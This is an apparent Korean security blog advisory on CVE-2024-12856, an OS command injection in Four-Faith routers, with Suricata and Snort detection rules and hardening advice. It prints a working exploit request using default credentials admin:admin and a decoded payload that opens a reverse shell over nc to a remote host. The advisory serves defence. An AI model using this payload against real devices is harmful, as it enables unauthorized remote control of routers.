1. Four-Faith

- 사물인터넷(IoT) 통신 장비 및 솔루션을 제공하는 중국 기업

2. CVE-2024-12856

[사진 1] CVE-2024-12856 [1]

- Four-Faith 라우터에서 발생하는 OS 명령 주입 취약점
> 공격자가 인증 없이 명령을 실행할 수 있으며, 현재 공격에 악용되는 중

영향받는 버전 : Four-Faith 라우터 모델 F3x24 및 F3x36

 

/apply.cgi 엔드포인트에 조작된 HTTP 요청을 전송해 OS 명령을 실행할 수 있음 [2][3][4]

> submit_type=adj_sys_time을 통해 장치의 시스템 시간을 수정할 때 adj_time_year 매개변수에 OS 명령 주입 가능
> adj_time_year 매개변수에 대한 검증이 적절하지 않거나 누락되어 발생하는 것으로 판단됨

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

[디코딩]
admin:admin
adj_time_year=$(cd /tmp/; mknod bOY p;cat bOY|/bin/sh -i 2>&1|nc 192.168.1.206 1270 >bOY; rm bOY;)

3. 대응방안

- 벤더사의 취약점 패치 발표 여부 확인 불가
> VulnCheck는 Suricata를 이용한 규칙 공유

alert http any any -> any any ( \
  msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
  flow:to_server; \
  http.method; content:"POST"; \
  http.uri; content:"/apply.cgi"; startswith; \
  http.header_names; content:"Authorization"; \
  http.request_body; content:"change_action="; \
  content:"adjust_sys_time"; \
  pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
  classtype:web-application-attack; \
  reference:cve,CVE-2024-12856; \
  sid:12700438; rev:1;)

 

> Snort 탐지 규칙

alert tcp any any -> any any (msg:"CVE-2024-12856"; flow:to_server,established; content:"POST"; http_method; content:"/apply.cgi"; http_uri; content:"adj_time_year"; http_client_body; nocase;)

 

- 권고사항
> 기본 자격 증명 변경
> 불필요 서비스 및 포트 비활성화
> 정기적 펌웨어 업데이트 등

4. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-12856
[2] https://vulncheck.com/advisories/four-faith-time
[3] https://vulncheck.com/blog/four-faith-cve-2024-12856
[4] https://ducklingstudio.blog.fc2.com/blog-entry-392.html
[5] https://www.boannews.com/media/view.asp?idx=135376
[6] https://www.dailysecu.com/news/articleView.html?idxno=162560

'취약점 > Injection' 카테고리의 다른 글

WordPress Fancy Product Designer SQL Injection 취약점 (CVE-2024-51818, CVE-2024-51919)  (0) 2025.01.10
WordPress WPLMS, VibeBP SQL Injection 취약점 (CVE-2024-56042, CVE-2024-56047, CVE-2024-56039, CVE-2024-56041)  (0) 2025.01.01
공항 보안 우회가 가능한 SQL Injection 취약점  (5) 2024.10.14
Ivanti Endpoint Manager(EPM) SQL Injection (CVE-2024-29824)  (1) 2024.10.05
Ivanti Cloud Service Appliance OS Command Injection (CVE-2024-8190)  (0) 2024.09.23

+ Recent posts

티스토리툴바